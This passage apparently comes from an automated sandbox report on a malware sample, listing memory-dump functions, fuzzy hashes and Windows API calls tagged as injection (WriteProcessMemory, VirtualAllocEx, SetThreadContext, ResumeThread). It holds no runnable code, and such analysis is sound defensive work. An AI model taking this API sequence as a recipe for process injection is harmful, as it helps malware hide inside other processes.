                          control_flow_graph 651 312590c-31259d9 CreateActCtxA 653 31259e2-3125a3c 651->653 654 31259db-31259e1 651->654 661 3125a4b-3125a4f 653->661 662 3125a3e-3125a41 653->662 654->653 663 3125a60 661->663 664 3125a51-3125a5d 661->664 662->661 666 3125a61 663->666 664->663 666->666
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031259C9
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: a2a13326eb6a8404155ccbc3ea242a93425f8675eca117f9911917e094083c9d
                          • Instruction ID: 55a963ea7925c1e9bcda7c6cf03948fa53256c9eaf53ff7c4b7382984af3fe57
                          • Opcode Fuzzy Hash: a2a13326eb6a8404155ccbc3ea242a93425f8675eca117f9911917e094083c9d
                          • Instruction Fuzzy Hash: 5941B2B0C00619CFDB24DFA9C985BDDFBB6BF49304F24806AD408AB255DB756945CF90
                          Function 031244C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 667 31244c4-31259d9 CreateActCtxA 670 31259e2-3125a3c 667->670 671 31259db-31259e1 667->671 678 3125a4b-3125a4f 670->678 679 3125a3e-3125a41 670->679 671->670 680 3125a60 678->680 681 3125a51-3125a5d 678->681 679->678 683 3125a61 680->683 681->680 683->683
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031259C9
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: ce939e76afe69ea8f3d9baad8eb608a8fef349ee6ae64d5b4b12fa8381049e0d
                          • Instruction ID: 8c9dd3941f7b672be7d6157765db3eab2957e5fe3cd070b42997eae642907862
                          • Opcode Fuzzy Hash: ce939e76afe69ea8f3d9baad8eb608a8fef349ee6ae64d5b4b12fa8381049e0d
                          • Instruction Fuzzy Hash: 5841B2B0C00629CFDB24DFA9C985B9DFBB6BF49304F24806AD408AB255DBB56945CF90
                          Function 07AB8030 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 684 7ab8030-7ab8086 687 7ab8088-7ab8094 684->687 688 7ab8096-7ab80d5 WriteProcessMemory 684->688 687->688 690 7ab80de-7ab810e 688->690 691 7ab80d7-7ab80dd 688->691 691->690
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB80C8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: b4641f7ffbfe7858a4e2dc620f42da51c331f81733b84c1cf730ea0c1a15af10
                          • Instruction ID: 2dacca4badef841eff39b684aaf19da3f8e43874a4c06fcc3302ec20b1be0e51
                          • Opcode Fuzzy Hash: b4641f7ffbfe7858a4e2dc620f42da51c331f81733b84c1cf730ea0c1a15af10
                          • Instruction Fuzzy Hash: 352168B59003099FCB10CFA9C985BEEFBF5FF48320F10842AE918A7251C7789944CBA0
                          Function 07AB8120 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 695 7ab8120-7ab81b5 ReadProcessMemory 699 7ab81be-7ab81ee 695->699 700 7ab81b7-7ab81bd 695->700 700->699
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB81A8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 4338a0ee981e44eada0721a160fcae1ebb59afb76d8187733ad31c354ea076e4
                          • Instruction ID: 51d1c7bc9346772cb59cef79f62704edc4b5ff5a17bf5743f9eaee15c81711ec
                          • Opcode Fuzzy Hash: 4338a0ee981e44eada0721a160fcae1ebb59afb76d8187733ad31c354ea076e4
                          • Instruction Fuzzy Hash: 3A217AB18003599FCB10DFA9D940ADEFBF4FF88320F10842AE918A3251C7389940CBA0
                          Function 07AB8038 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 704 7ab8038-7ab8086 706 7ab8088-7ab8094 704->706 707 7ab8096-7ab80d5 WriteProcessMemory 704->707 706->707 709 7ab80de-7ab810e 707->709 710 7ab80d7-7ab80dd 707->710 710->709
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB80C8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: a0eab76b7a219b55671e42589f34c5cbbfd002b46baf83c7673285ba19d607fe
                          • Instruction ID: 81896897c87c9704fcea447f01f1fde98f677d13cc7844262ecfa4f179f208a5
                          • Opcode Fuzzy Hash: a0eab76b7a219b55671e42589f34c5cbbfd002b46baf83c7673285ba19d607fe
                          • Instruction Fuzzy Hash: 272157B19003599FCB10CFA9C984BDEBBF5FF48310F108429E918A7251C7789944CBA4
                          Function 07AB7A60 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB7AE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 0877b5bd3dd1b44e3c7c236b7acfecb6d690aacedbeaecc2d1fd496b8060f411
                          • Instruction ID: caef929053f4ba6ce95cd9488523ce03cac39e34c2fa5885b0ad1a86ef040d41
                          • Opcode Fuzzy Hash: 0877b5bd3dd1b44e3c7c236b7acfecb6d690aacedbeaecc2d1fd496b8060f411
                          • Instruction Fuzzy Hash: FF2159B19002098FDB10DFAAC5857EEBFF4EF88324F14842AD459A7241CB789A45CFA5
                          Function 0312D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0312D717
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 9631d5db38929e121d3ec90eb0a97dc7180127b6e3457c30e8577c8996a7fed2
                          • Instruction ID: efd1bbbe3d28dad1559930ea2263234614d87fd7d288b4e4ce822705c305f722
                          • Opcode Fuzzy Hash: 9631d5db38929e121d3ec90eb0a97dc7180127b6e3457c30e8577c8996a7fed2
                          • Instruction Fuzzy Hash: 5721E3B59002589FDB10CFAAD584ADEBFF9EB48324F14801AE918A7250D378A950CFA5
                          Function 07AB8128 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB81A8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 2e6f21a638ad5919e42a4faf7b62926e9f55912d5b4730f0d2389e845236207a
                          • Instruction ID: a6daf3cc8f736a17f6567958aa19fce302300c57739043193860a4f430d9d79d
                          • Opcode Fuzzy Hash: 2e6f21a638ad5919e42a4faf7b62926e9f55912d5b4730f0d2389e845236207a
                          • Instruction Fuzzy Hash: 232139B18003599FDB10DFAAC944ADEFBF5FF88310F108429E559A7250C7799544CBA4
                          Function 07AB7A68 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB7AE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: b064801ac697d0e6c2a80b2ea3ce9221c6419befe6cfec043043f169823a678d
                          • Instruction ID: f64b2e69cb0610ced1152b610012bf82568ff8043facd1c8178707639dc0a7d6
                          • Opcode Fuzzy Hash: b064801ac697d0e6c2a80b2ea3ce9221c6419befe6cfec043043f169823a678d
                          • Instruction Fuzzy Hash: C4213AB19003098FDB10DFAAC4457EEBBF4EF88314F14842ED459A7241C7789544CFA5
                          Function 0312D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0312D717
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: c5145c21c308e764d79662f3885e8ad715c8ee8468d2c5242ada06635e969516
                          • Instruction ID: 17602bc0af233feaa495bd59d61f1e7eea4540cb45b6d27c021c4820cdb32829
                          • Opcode Fuzzy Hash: c5145c21c308e764d79662f3885e8ad715c8ee8468d2c5242ada06635e969516
                          • Instruction Fuzzy Hash: 9C21E4B59002589FDB10CFAAD584ADEFFF4FB48314F14801AE914A3350D378A950CFA4
                          Function 07AB7F73 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB7FE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 3c0b3d1f4f133adfa2246ea8431395f068a284d6772e3df20363f0a6b20e7119
                          • Instruction ID: 1cdcc493a20b479083988f4a217ec7dd7bf6ddfa646bc13ba72e2d76e62eb92e
                          • Opcode Fuzzy Hash: 3c0b3d1f4f133adfa2246ea8431395f068a284d6772e3df20363f0a6b20e7119
                          • Instruction Fuzzy Hash: 84116AB29002499FCB20DFAAC944BDEFFF5EF88320F20841AE515A7250CB75A540CFA4
                          Function 0312A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0312B079,00000800,00000000,00000000), ref: 0312B28A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: e48422a99160881152404c298e7f693af8e8fd82d34fe1a16842f8e0674ba26b
                          • Instruction ID: 4351187d0f3fd93a92469d1ffe1ad2fa0964ed4ce98b1a95bfed2d8b0a964342
                          • Opcode Fuzzy Hash: e48422a99160881152404c298e7f693af8e8fd82d34fe1a16842f8e0674ba26b
                          • Instruction Fuzzy Hash: 281123B69043188FDB20CF9AC544BDEFBF4EB88310F14842AE419A7610C375A944CFA4
                          Function 0312B218 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0312B079,00000800,00000000,00000000), ref: 0312B28A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: d394cea6c023c76416ad9ec72642f666d8cccd135aae87530c4e90af33e0778a
                          • Instruction ID: b45b658b673bddad4531da09dd8f6bcae32a960cab7d11f37c87fc5cf81d1fc9
                          • Opcode Fuzzy Hash: d394cea6c023c76416ad9ec72642f666d8cccd135aae87530c4e90af33e0778a
                          • Instruction Fuzzy Hash: 4B1123B6C003198FDB14CFAAC544ADEFBF4EB48310F14842AE819A7620C375A645CFA5
                          Function 07AB7F78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB7FE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 2647b4fcd4f2c63dd547d7f097a68d6e7d64242f3e96a62088fb2f8ab29a4ede
                          • Instruction ID: c84daec9840519a3f80689ff3995731224104d2f179daeeed1082fda9deda766
                          • Opcode Fuzzy Hash: 2647b4fcd4f2c63dd547d7f097a68d6e7d64242f3e96a62088fb2f8ab29a4ede
                          • Instruction Fuzzy Hash: 241137B29002499FCB20DFAAC844BDEBFF5EF88320F10841AE559A7250CB75A544CFA4
                          Function 07AB7579 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: ffd5e296c4ddaedf5a9b952bff07d32186ea6ad178550de5992a9df56f2d8dcf
                          • Instruction ID: 48224f6bbff9a56fb699f7973820c8bd8e99d1dacc6d99b41b72c8437a2f58a3
                          • Opcode Fuzzy Hash: ffd5e296c4ddaedf5a9b952bff07d32186ea6ad178550de5992a9df56f2d8dcf
                          • Instruction Fuzzy Hash: 4A116AB59003498FDB24DFAAC4447DEFFF4EB89324F24842AD459A7250CB75A944CFA4
                          Function 07AB7580 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: b82f4ec7978744584505260abf5712d570e9ce8663071345a0b6e389ba09e23c
                          • Instruction ID: 8d741718955d5118898713c2bf0536ff80bc5615c26c2d66e37c9a73dc549236
                          • Opcode Fuzzy Hash: b82f4ec7978744584505260abf5712d570e9ce8663071345a0b6e389ba09e23c
                          • Instruction Fuzzy Hash: 0A1136B19003498FDB20DFAAC4457DEFBF8EB88324F20842AD459A7250CB75A944CFA4
                          Function 0312AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0312AFFE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 4c48c3a44e2bd8f6a1ad01440cd8dd116da28f7edbc6e58af41f30351be39165
                          • Instruction ID: ee4cdaf8616404cc66ff933edb90b106f6e547537a958fddad0a4054a6a3b1c3
                          • Opcode Fuzzy Hash: 4c48c3a44e2bd8f6a1ad01440cd8dd116da28f7edbc6e58af41f30351be39165
                          • Instruction Fuzzy Hash: 6E110CB6C002598FCB20CF9AC544ADEFBF4AF88324F14842AD829A7610D379A545CFA5
                          Function 07ABB5D4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07ABBD85
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 3d75a14b8ea55179cfd749dd6d1661928aee9553350b1dbc8d5b7e70cb036143
                          • Instruction ID: 479efb7b472f6418e070f003ba01737ec514fb1c152dd8545c5cd5f533521eb9
                          • Opcode Fuzzy Hash: 3d75a14b8ea55179cfd749dd6d1661928aee9553350b1dbc8d5b7e70cb036143
                          • Instruction Fuzzy Hash: 651133B5800348DFDB20DF8AC888BDEBBF8EB48320F108419E558A7600C379A940CFA0
                          Function 07ABBD22 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07ABBD85
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 729fe85d74a8659a7ccd0600b32d795a558733082411be165ff69edb379479ea
                          • Instruction ID: ec1985cb86e5d375b830fa956da87fa68380a0a31767d818bcee8e1c9d92b2bb
                          • Opcode Fuzzy Hash: 729fe85d74a8659a7ccd0600b32d795a558733082411be165ff69edb379479ea
                          • Instruction Fuzzy Hash: F91125B5800348DFCB10DF9AD445BDEBBF8EB48320F108419E458A3600C374A940CFA1
                          Function 0168D1FC Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac38069fcc6cce062b4d7830a36f11f4a9198e9b2dedc7684b73f032c6212477
                          • Instruction ID: ffb74c2b8b25d5fa0ba5f3b10706712a39b1356cfd8c9aae960e3a67e5c96ce1
                          • Opcode Fuzzy Hash: ac38069fcc6cce062b4d7830a36f11f4a9198e9b2dedc7684b73f032c6212477
                          • Instruction Fuzzy Hash: BE21F171504204DFDB06EF98D9D4B2ABF65FB88324F20C669EA094A296C336D416CBB1
                          Function 0168D4C4 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
                          • Instruction ID: c6f0798584bc55ebdb9fcd61bee7ea69601a71e2d7949267d3d8f16f4eabef77
                          • Opcode Fuzzy Hash: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
                          • Instruction Fuzzy Hash: 28210671500240DFDB05EF58D9C0F27BF65FB84318F20C66AD9054B296C336D456C6B2
                          Function 0169D01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1805100770.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_169d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
                          • Instruction ID: 42040218247c189165dbd63cc91efcc7c1d5b8561755fd0143b31e587246795d
                          • Opcode Fuzzy Hash: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
                          • Instruction Fuzzy Hash: 4F21D071604200DFDF15DF68D984B26BBA9EB84354F20C579D94A4B396C33AD447CA61
                          Function 0169D006 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1805100770.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_169d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
                          • Instruction ID: b3674776dd66ceb2a519abc3434d2991a038f86c7d0155c1ed5c5fa1c13d4dc1
                          • Opcode Fuzzy Hash: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
                          • Instruction Fuzzy Hash: B1219F755083809FDB02CF64D994B11BFB5FB46314F24C5EAD8498F2A7C33A980ACB62
                          Function 0168D1F7 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction ID: b595a979f9156b11b01df36027a7b1e96d9d626122137853954844aef3b54133
                          • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction Fuzzy Hash: 4821E176404244CFDB06DF44D9C4B16BF72FB84324F24C2A9DD084B296C33AD42ACBA1
                          Function 0168D4BF Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                          • Instruction ID: 7c39f9d02efdfc9b08c86bafab707d263c3e51de72211900a3abaca7dd959bc9
                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                          • Instruction Fuzzy Hash: 5E11E172404280DFCB02DF54D9C4B16BF71FB84318F24C6AAD9090B656C336D45ACBB2
                          Function 0168D731 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 45ee0d60fd7cd29f222b202c5f904bbc8b408f72c8d2a9923738cdf64902b9a2
                          • Instruction ID: 409063bf499f08ab29957031f5589bc78a3449607cb150a23c7f81c64936058f
                          • Opcode Fuzzy Hash: 45ee0d60fd7cd29f222b202c5f904bbc8b408f72c8d2a9923738cdf64902b9a2
                          • Instruction Fuzzy Hash: 0601A771009384AAE7117A69CD84B77FFA8EF41324F18C629ED094B2D6C779D840C6B1
                          Function 0168D730 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a7a747a5b8bfa161a393aab9ad8bb17d3193fe236c7e539afdf1da94689cf45
                          • Instruction ID: e8181b63fc689d8110d582cde30cbae43fff113702e2135350257fea54aaefe5
                          • Opcode Fuzzy Hash: 6a7a747a5b8bfa161a393aab9ad8bb17d3193fe236c7e539afdf1da94689cf45
                          • Instruction Fuzzy Hash: 56F06271405384AAE7119A1ACD84B76FFA8EB81734F18C55AED085F6C6C3799844CAB1

                          Execution Graph

                          Execution Coverage:0.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:1
                          Total number of Limit Nodes:0
                          execution_graph 62518 14d2c1d LdrInitializeThunk

                          Executed Functions

                          Function 014D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 14d2c0a-14d2c0f 1 14d2c1f-14d2c26 LdrInitializeThunk 0->1 2 14d2c11-14d2c18 0->2
                          APIs
                          • LdrInitializeThunk.NTDLL(014EFD4F,000000FF,00000024,01586634,00000004,00000000,?,-00000018,7D810F61,?,?,014A8B12,?,?,?,?), ref: 014D2C24
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f8ae5896356ae3f87ab21b5b5589e9bf52b82235b74c8121b6c2d61e280c2663
                          • Instruction ID: 543f74786fda0cde33c29cbf5317488b15e053aef86460650445c62172085fb1
                          • Opcode Fuzzy Hash: f8ae5896356ae3f87ab21b5b5589e9bf52b82235b74c8121b6c2d61e280c2663
